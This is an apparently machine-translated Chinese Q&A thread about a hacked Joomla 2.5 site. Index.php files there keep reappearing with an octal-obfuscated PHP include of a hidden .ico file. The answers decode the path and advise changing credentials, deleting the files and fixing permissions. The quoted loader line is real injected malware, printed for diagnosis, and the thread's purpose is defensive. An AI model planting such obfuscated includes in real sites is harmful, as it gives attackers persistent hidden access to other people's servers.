一些index.php文件自动生成或保存在我的doucment根文件夹中

一些index.php文件自动生成或保存在我的doucment根文件夹中,php,Php,Index.php文件是自动生成的 我用RSfirewall扫描index.php文件。 它在joomla 2.5中 <?php /*df76c*/ @include "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157"; /*df76c

Index.php文件是自动生成的

我用RSfirewall扫描index.php文件。 它在joomla 2.5中

<?php
/*df76c*/

@include "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h  \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";

/*df76c*/

这看起来你的网站被黑客攻击了。请先更改服务器凭据和数据库凭据

如果要检查调用的文件,只需回显该语句即可获得该文件

<?php
/*df76c*/

echo "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h  \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";

/*df76c*/
?>
请从服务器上删除所有此类文件


希望这会有所帮助。

您已经被解雇了。检查服务器上的文件,网址为
/home/earthtohavenco/public_html/libraries/f0f/integration/.59725435.ico
-这几乎肯定是黑客的恶意软件。-sameis的WP参考是否有任何方法可以让我完全从代码中删除此恶意软件?不幸的是-没有。如果您一直保留它们,您可以做的是从备份中回滚。所有操作都已完成,但当我删除此文件并在2-3天后用RSfirewall扫描时,它会再次出现。@AnilJahangir您服务器上的某些端口已打开并关闭更改允许公共写入权限的文件权限如何在我的WHM中检查此公共写入权限。WHM中是否有任何命令或选项。
/home/earthtoheavenco/public_h tml/libraries/f0f/integration/.59725435.ico